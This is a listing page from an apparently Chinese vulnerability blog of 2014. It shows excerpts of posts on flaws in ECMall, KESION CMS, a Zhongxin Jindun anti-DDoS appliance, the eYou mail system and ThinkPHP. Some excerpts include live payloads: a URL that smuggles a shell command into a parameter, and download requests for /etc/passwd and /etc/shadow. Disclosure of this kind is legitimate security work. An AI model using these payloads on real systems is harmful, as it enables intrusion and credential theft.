漏洞时代

因为改版,丢失了大量的友情..本站的文章都大多源自网络.并不是都是原创。如果没有著名出处。可能是转载文章的时候没有写或者是文章本身就是转载的就没在写出处。本站定位就是分享资源。如果有版权问题,请联系本站删除或者更改!!!需要交换链接的朋友请到关于我们留言~~

ecmall2.x修改任意管理员和用户密码

app/find_password.php [php] function set_password() { if (!IS_POST) { ...... } else //POST提交 { if (empty($_POST['new_password']) || empty($_POST['confirm_password'])) { $this->show_warning("unsettl...

没穿底裤 2014 年 05 月 02 日 暂无评论

科讯KESION CMS最新版任意文件上传WEBSHELL

会员上传文件漏洞,可以上传任意后缀user/swfupload.asp文件漏洞[php]If UpFileObj.Form("NoReName")="1" Then '不更名Dim PhysicalPath,FsoObj:Set FsoObj = KS.InitialObject(KS.Setting(99))PhysicalPath = Server.MapPath(replace(Tem...

没穿底裤 2014 年 05 月 02 日 15 条评论

中新金盾抗拒绝服务系统GetShell漏洞2

漏洞作者: Tea漏洞证明: https://1.1.1.1:28XXX/cgi-bin/index.php?t=analysis_download&c=tarfile&dir=1 || uname -a > /tmp/1||echo命令:uname -a > /tmp/1写入到/tmp/1文件可以写任意文件到任意目录,还愁啥? 

没穿底裤 2014 年 04 月 27 日 暂无评论

中新金盾抗拒绝服务系统GetShell漏洞

漏洞作者: Tea任意文件下载漏洞:https://1.1.1.1:28XX3/cgi-bin/index.php?t=service&c=download&filepath=/etc/passwdhttps://1.1.1.1:28XX3/cgi-bin/index.php?t=service&c=download&filepath=/etc/shadowS...

没穿底裤 2014 年 04 月 27 日 暂无评论

eYou邮件系统远程命令执行

#1 漏洞代码/grad/admin/domain_logo.php [php] [/php] [php] $domain = $_COOKIE['cookie'];//接收cookie值,无任何过滤$fp = popen("/var/eyou/sbin/hashid ".$domain,'r');//直接带进了危险函数popen 可远程执行任意命令 [/php] #2 漏洞利用访问htt...

没穿底裤 2014 年 04 月 26 日 7 条评论

ThinkPHP的Ubb标签漏洞读取任意内容

简要描述:ThinkPHP的Ubb标签,有一个代码高亮的功能,即满足: [c ode]xxx[/c ode]或者[p hp]xxx[/p hp]的时候,会对中间的xxx读取,并高亮,xxx是路径,而非具体的代码,如下图1,输入路径后,当文件存在,返回的是高亮后的文件内容详细说明:Common/extend.phpCore/Extend/Function/extend.php成因:ThinkP...

没穿底裤 2014 年 04 月 26 日 暂无评论